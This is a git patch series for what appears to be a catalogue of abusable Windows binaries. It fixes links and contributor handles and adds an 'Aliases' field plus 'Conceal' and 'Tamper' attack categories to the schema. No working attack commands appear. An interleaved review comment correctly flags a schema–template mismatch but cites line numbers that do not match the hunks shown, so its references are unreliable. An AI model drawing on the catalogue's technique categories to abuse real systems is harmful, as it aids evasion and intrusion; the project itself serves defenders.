diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml
index 01a868b..a6f9a94 100644
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@@ -46,7 +46,7 @@ Detection:
 - IOC: bitsadmin creates new files
 - IOC: bitsadmin adds data to alternate data stream
 Resources:
- - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
+ - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml
index 22a9279..21554b2 100644
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@@ -66,4 +66,4 @@ Acknowledgement:
 - Person: egre55
 Handle: '@egre55'
 - Person: Mike Cary
- Handle: 'grayfold3d'
+ Handle: '@grayfold3d'
diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml
index 0b86026..6293171 100644
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@@ -37,4 +37,4 @@ Acknowledgement:
 - Person: BennyHusted
 Handle: ''
 - Person: Amit Serper
- Handle: '@0xAmit '
+ Handle: '@0xAmit'
From e37d01107b4c0ec71553d5f2e8fec25ca71e9b1c Mon Sep 17 00:00:00 2001
From: xenoscr
Date: Thu, 15 Sep 2022 13:36:30 -0400
Subject: [PATCH 59/60] Adding Coneal & Tamper categories to template and Schema.
---
 YML-Schema.yml | 11 ++++++++++-
 YML-Template.yml | 2 ++
 2 files changed, 12 insertions(+), 1 deletion(-)
diff --git a/YML-Schema.yml b/YML-Schema.yml
index 11f3409..f1256f4 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@@ -12,6 +12,15 @@ mapping:
 "Description":
 type: str
 required: true
+ "Aliases":
+ type: seq
+ required: false
+ sequence:
+ - type: map
+ mapping:
+ "Alias":
+ type: str
+ required: false
 "Author":
 type: str
 required: true
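Review bot: The `Aliases` entry added to the schema in the last hunk here is a top-level key (it sits between `Description` and `Author` under the root `mapping:`) whose items are maps carrying an `Alias` key, but the YML-Template.yml hunk at L99 documents `Aliases` inside a `Commands` entry as a sequence of plain strings; a file written from the template would presumably fail this schema on both placement and item type. One of the two needs to move so that template and schema agree. If the template is the intent, the schema entry belongs under the `Commands` item mapping with `type: seq` and `sequence:` holding a single `- type: str` entry; if the schema is the intent, the template should show `Aliases:` at top level with `- Alias: ProcDump64.exe` style items. Patch 60 (last hunk at L99) only re-indents this block and does not address the mismatch.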
@@ -36,7 +45,7 @@ mapping:
 "Category":
 type: str
 required: true
- enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload]
+ enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
 "Privileges":
 type: str
 required: true
diff --git a/YML-Template.yml b/YML-Template.yml
index 8556fd6..ea4a2ac 100644
--- a/YML-Template.yml
+++ b/YML-Template.yml
@@ -6,6 +6,8 @@ Created: YYYY-MM-DD (date the person created this file)
 Commands:
 - Command: The command
 Description: Description of the command
+ Aliases:
+ - An alias for the command (example: ProcDump.exe & ProcDump64.exe)
 Usecase: A description of the usecase
 Category: Execute
 Privileges: Required privs
From 033598bc77b3470d5ffabcbc6bafa72c718063c5 Mon Sep 17 00:00:00 2001
From: xenoscr
Date: Thu, 15 Sep 2022 13:44:18 -0400
Subject: [PATCH 60/60] Fixing indentation in YML-Schema.yml
---
 YML-Schema.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/YML-Schema.yml b/YML-Schema.yml
index f1256f4..dc3f775 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@@ -19,8 +19,8 @@ mapping:
 - type: map
 mapping:
 "Alias":
- type: str
- required: false
+ type: str
+ required: false
 "Author":
 type: str
 required: true